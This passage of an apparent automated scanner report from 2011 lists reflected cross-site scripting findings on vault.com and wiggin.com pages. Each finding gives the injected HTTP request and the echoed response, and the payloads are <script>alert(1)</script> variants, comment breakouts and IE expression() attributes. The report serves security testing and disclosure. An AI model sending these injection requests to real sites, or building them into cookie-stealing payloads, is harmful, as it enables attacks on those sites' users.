IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000K1yGfQZN8SWAfxe-SUlZ777:140i3s34m; Path=/
Keep-Alive: timeout=10, max=55
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:42 GMT;path=/
Content-Length: 59998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
<a href="#"    onclick="toggleDisplayId('save');_gaq.push(['_trackEvent', 'vault.com tools', 'save', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP?d464a"><script>alert(1)</script>25a04331083=1']);">
...[SNIP]...
5.64. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript inline comment. The payload ed43f*/alert(1)//30f0f273048 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/ed43f*/alert(1)//30f0f273048/company-profile/Ober--Kaler--Grimes-&-Shriver HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 17:00:37 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL08DA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAIIqRNk!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000_wG53PcVnIj92oh0yQ48Gf8:140i3s34m; Path=/
Keep-Alive: timeout=10, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:26:22 GMT;path=/
Content-Length: 71983


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
alse , hideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/ed43f*/alert(1)//30f0f273048'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenger'
...[SNIP]...
5.65. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 700f3"><script>alert(1)</script>944772e5efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver?700f3"><script>alert(1)</script>944772e5efd=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:47 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000FR0kyycLjz6XnThAh-wBoFE:140i3s34m; Path=/
Keep-Alive: timeout=10, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:32 GMT;path=/
Content-Length: 60654


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
<a href="#"    onclick="toggleDisplayId('save');_gaq.push(['_trackEvent', 'vault.com tools', 'save', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver?700f3"><script>alert(1)</script>944772e5efd=1']);">
...[SNIP]...
5.66. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript inline comment. The payload 60b04*/alert(1)//96f7bac1953 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/60b04*/alert(1)//96f7bac1953/company-profile/Perkins-Coie-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 17:00:36 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL08DA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAIIqRNk!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000xmHAZMR6Nl-4T871ft2n5MR:140i3s34m; Path=/
Keep-Alive: timeout=10, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:26:21 GMT;path=/
Content-Length: 71715


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
alse , hideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/60b04*/alert(1)//96f7bac1953'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenger'
...[SNIP]...
5.67. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19102"><script>alert(1)</script>4fc70b1cc5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP?19102"><script>alert(1)</script>4fc70b1cc5c=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:46 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000ShRqYT5OJcQ5j6dhmHHmPJY:140i3s34m; Path=/
Keep-Alive: timeout=10, max=78
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:31 GMT;path=/
Content-Length: 60500


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
<a href="#"    onclick="toggleDisplayId('save');_gaq.push(['_trackEvent', 'vault.com tools', 'save', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP?19102"><script>alert(1)</script>4fc70b1cc5c=1']);">
...[SNIP]...
5.68. http://www.wiggin.com/about.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /about.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c3cf1'style%3d'x%3aexpression(alert(1))'d298a71c784 was submitted in the REST URL parameter 1. This input was echoed as c3cf1'style='x:expression(alert(1))'d298a71c784 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about.aspxc3cf1'style%3d'x%3aexpression(alert(1))'d298a71c784 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:06:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16393


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/about.aspxc3cf1'style='x:expression(alert(1))'d298a71c784&PrintPage=True'>
...[SNIP]...
5.69. http://www.wiggin.com/about.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /about.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e6832'><script>alert(1)</script>dcbc263f08b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about.aspx?e6832'><script>alert(1)</script>dcbc263f08b=1 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 17:06:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 25238


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<a id="printthispage" target="_blank" href='about.aspx?e6832'><script>alert(1)</script>dcbc263f08b=1&PrintPage=True'>
...[SNIP]...
5.70. http://www.wiggin.com/about.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /about.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cd0d1--><script>alert(1)</script>e4eba2e5a64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /about.aspx?cd0d1--><script>alert(1)</script>e4eba2e5a64=1 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 17:06:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 25242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<!-- /about.aspx?cd0d1--><script>alert(1)</script>e4eba2e5a64=1 Rendered in 0.015625 sec. -->
5.71. http://www.wiggin.com/alumni.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /alumni.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9838a'style%3d'x%3aexpression(alert(1))'c0d75e8f0fa was submitted in the REST URL parameter 1. This input was echoed as 9838a'style='x:expression(alert(1))'c0d75e8f0fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alumni.aspx9838a'style%3d'x%3aexpression(alert(1))'c0d75e8f0fa HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/showarea.aspx?Show=10669
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.4.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:13:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16395


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/alumni.aspx9838a'style='x:expression(alert(1))'c0d75e8f0fa&PrintPage=True'>
...[SNIP]...
5.72. http://www.wiggin.com/alumni.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /alumni.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 289bf'><script>alert(1)</script>cbf7b6d9b11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alumni.aspx?289bf'><script>alert(1)</script>cbf7b6d9b11=1 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/showarea.aspx?Show=10669
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.4.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:13:00 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 20197


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<a id="printthispage" target="_blank" href='alumni.aspx?289bf'><script>alert(1)</script>cbf7b6d9b11=1&PrintPage=True'>
...[SNIP]...
5.73. http://www.wiggin.com/alumni.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /alumni.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 11be8--><script>alert(1)</script>d6f022e3a4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /alumni.aspx?11be8--><script>alert(1)</script>d6f022e3a4e=1 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/showarea.aspx?Show=10669
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.4.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:13:01 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 20204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<!-- /alumni.aspx?11be8--><script>alert(1)</script>d6f022e3a4e=1 Rendered in 0.015625 sec. -->
5.74. http://www.wiggin.com/alumniregistration.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /alumniregistration.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dfa95'style%3d'x%3aexpression(alert(1))'b9fc9e43ae2 was submitted in the REST URL parameter 1. This input was echoed as dfa95'style='x:expression(alert(1))'b9fc9e43ae2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alumniregistration.aspxdfa95'style%3d'x%3aexpression(alert(1))'b9fc9e43ae2 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/alumni.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.5.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:13:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16435


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/alumniregistration.aspxdfa95'style='x:expression(alert(1))'b9fc9e43ae2&PrintPage=True'>
...[SNIP]...
5.75. http://www.wiggin.com/alumniregistration.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /alumniregistration.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dbec7'><script>alert(1)</script>356000e8f58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alumniregistration.aspx?dbec7'><script>alert(1)</script>356000e8f58=1 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/alumni.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.5.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:13:09 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 26152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<a id="printthispage" target="_blank" href='alumniregistration.aspx?dbec7'><script>alert(1)</script>356000e8f58=1&PrintPage=True'>
...[SNIP]...
5.76. http://www.wiggin.com/alumniregistration.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /alumniregistration.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bcdf3--><script>alert(1)</script>547157555d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /alumniregistration.aspx?bcdf3--><script>alert(1)</script>547157555d1=1 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/alumni.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.5.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:13:09 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 26158


